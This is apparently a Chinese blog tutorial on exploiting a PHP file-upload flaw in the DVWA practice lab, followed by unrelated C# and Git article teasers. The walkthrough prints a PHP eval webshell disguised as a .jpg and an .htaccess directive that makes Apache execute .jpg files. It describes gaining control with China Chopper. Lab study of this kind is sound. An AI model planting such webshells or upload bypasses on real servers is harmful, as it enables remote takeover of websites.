php文件上传漏洞图片解析漏洞
(1).先看靶机代码:
<?php
if (isset($_POST['Upload']))
{
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
$blackList = ['php', 'asp', 'exe', 'jsp', 'aspx', 'js', 'py', 'cpp', 'com', 'bat', 'dll', 'sh','html','rar','iso','zip'];
if(in_array($uploaded_ext,$blackList))
{
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
}
else
{
if (!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path))
{
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
}
else
{
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
}
?>靶机只支持运行php脚本,但是不允许上传php。
(2).创建1个c.php.jpg文件伪装为图片文件:
<?php @eval($_POST['pass']);?>
(3).访问图片文件http://192.168.147.131/dvwa/hackable/uploads/c.php.jpg发现无法执行成功,因为服务器认为是图片文件,不允许执行
(4).上传文件.htaccess 设置允许执行.jpg文件,因为服务器是apache允许这样设置。
AddType application/x-httpd-php .jpg
(5).中国菜刀连接成功
“php文件上传漏洞图片解析漏洞” 的相关文章
c#中string和StringBuilder效率对比
c#中string和StringBuilder直接看看执行速度。(2).String类型累计赋值Test ...
Git本地仓库学习
1.全局用户信息设置 git config --global user.name gaojiufeng git config --global user.email 392223903...
Git推送文件到远程仓库
1.远程仓库的协作模式开发者把自己最新的版本推到线上仓库,同时把线上仓库的最新代码,拉到自己本地即可2.注册git帐号国外: http://www.github.com国内: http://git.oschina.net2.在码云创建项目,不要初始化readmegit push https://gi...
Git从远程仓库更新文件
git pull https://git.oschina.net/392223903/learn.git master 换为您的git地址...
Git日志查看和版本切换
日志查看:git log版本切换:方式1:git reset --hard HEAD^ 倒退一个版本git reset --hard HEAD^^ 倒退两个版本方式2:(版本号的形式,建议版本号码补充完...
c#中文简体转换繁体
private const string fantizi = "高久峰是個程序員"; private const string jiantizi = "高久峰是个程序员...